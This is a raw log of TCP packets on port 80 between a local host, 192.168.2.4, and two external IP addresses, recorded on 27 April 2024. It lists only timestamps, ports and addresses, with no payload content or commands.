Apr 27, 2024 01:31:17.630621910 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.630660057 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.630671978 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.630700111 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.630706072 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.630743027 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.630758047 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.630784035 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.630824089 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.630825043 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.630861998 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.630868912 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.630899906 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.630904913 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.630940914 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.630945921 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.630980968 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.631017923 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.631027937 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.631057978 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.631068945 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.631097078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.631103039 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.631134987 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.631135941 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.631174088 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.631185055 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.631213903 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.631217957 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.631254911 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.631266117 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.631294012 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.631297112 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.631333113 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.631371975 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.631382942 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.631408930 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.631412983 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.631449938 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.631450891 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.631488085 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.631493092 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.631526947 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.631545067 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.631566048 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.631575108 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.631606102 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.631611109 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.631645918 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.631649971 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.631685019 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.631699085 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.631726027 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.631731987 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.631763935 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.631803989 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.631841898 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.631870031 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.631880999 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.631881952 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.631920099 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.631923914 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.631944895 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.631959915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.631975889 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.631998062 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.632034063 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.632038116 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.632045984 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.632080078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.632124901 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.632145882 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.632150888 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.632184982 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.632206917 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.632224083 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.632229090 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.632263899 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.632272005 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.632302046 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.632308006 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.632342100 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.632344961 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.632381916 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.632391930 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.632421017 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.632428885 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.632461071 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.632466078 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.632499933 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.632502079 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.632539988 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.632550955 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.632586956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.632627010 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.632637978 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.632666111 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.632673979 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.632704973 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.632719040 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.632745028 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.632755041 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.632781982 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.632796049 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.632823944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.632869005 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.632879019 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.632908106 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.632947922 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.632975101 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.632986069 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.633001089 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.674767971 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.712919950 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:17.712984085 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:17.713068008 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:17.713100910 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:17.713140965 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:17.713165998 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:17.713212967 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:17.713300943 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:17.713370085 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:17.713433981 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:17.713490963 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:17.713542938 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:17.713603020 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:17.713634968 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:17.713671923 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:17.713710070 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:17.713732004 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:17.713756084 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:17.713787079 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:17.713824987 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:17.713845968 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:17.713877916 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:17.713902950 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:17.713949919 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:17.713968039 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:17.714003086 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:17.714040995 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:17.714063883 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:17.714098930 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:17.714153051 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:17.714190960 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:17.714215994 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:17.714251041 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:17.714272976 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:17.714688063 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:17.829355955 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.829437017 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.829477072 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.829483986 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.829536915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.829576969 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.829617023 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.829633951 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.829655886 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.829675913 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.829694033 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.829735041 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.829760075 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.829773903 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.829811096 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.829849005 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.829858065 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.829890013 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.829895973 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.829931974 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.829971075 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.829976082 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.830008984 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.830049992 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.830079079 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.830086946 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.830125093 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.830128908 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.830163956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.830218077 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.830255032 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.830262899 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.830293894 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.830302000 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.830334902 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.830377102 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.830415964 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.830424070 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.830454111 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.830461979 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.830492973 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.830533981 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.830570936 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.830571890 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.830610991 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.830648899 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.830655098 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.830686092 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.830713034 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.830729008 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.830768108 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.830805063 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.830821991 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.830843925 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.830846071 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.830883980 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.830921888 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.830960035 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.830996037 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.831001997 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.831026077 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.831037045 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.831077099 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.831084967 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.831116915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.831157923 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.831196070 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.831204891 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.831238985 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.831244946 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.831279993 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.831316948 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.831326962 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.831356049 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.831393957 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.831433058 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.831439972 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.831471920 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.831475973 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.831511021 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.831548929 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.831588984 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.831605911 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.831628084 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.831635952 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.831669092 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.831707954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.831746101 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.831774950 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.831784010 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.831800938 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.831823111 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.831862926 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.831901073 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.831913948 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.831940889 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.831944942 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.831981897 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.832020044 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.832052946 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.832060099 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.832115889 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.832117081 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.832156897 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.832196951 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.832204103 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.832237005 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.832274914 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.832287073 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.832314014 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.832350969 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.832387924 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.832417965 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.832427979 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.832454920 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.832469940 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.832508087 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.832547903 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.832561016 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.832593918 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.832597017 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.832634926 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.832674026 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.832688093 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.832710981 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.832747936 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.832784891 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.832791090 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.832824945 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.832828999 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.832866907 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.832906961 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.832945108 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.832968950 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.832983971 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.832993984 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.833022118 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.833060026 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.833096981 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.833111048 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.833137989 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.833141088 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.833178997 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.833216906 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.833256006 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.833268881 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.833296061 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.833306074 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.833334923 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.833374023 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.833420992 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.868952036 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.869013071 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.883389950 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:17.883435965 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:17.883475065 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:17.883517027 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:17.883559942 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:17.883582115 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:17.883622885 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:17.883661032 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:17.883683920 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:17.883717060 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:17.883739948 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:17.883779049 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:17.883804083 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:17.883837938 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:17.883862019 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:17.883903027 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:17.883924007 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:17.883956909 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:17.884056091 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:17.884133101 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:17.884298086 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:17.884354115 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:17.884413004 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:17.884453058 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:17.884478092 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:17.884510994 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:17.884535074 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:17.884573936 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:17.884598017 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:17.884629965 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:17.884654999 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:17.884692907 CEST	80	49733	185.172.128.76	192.168.2.4
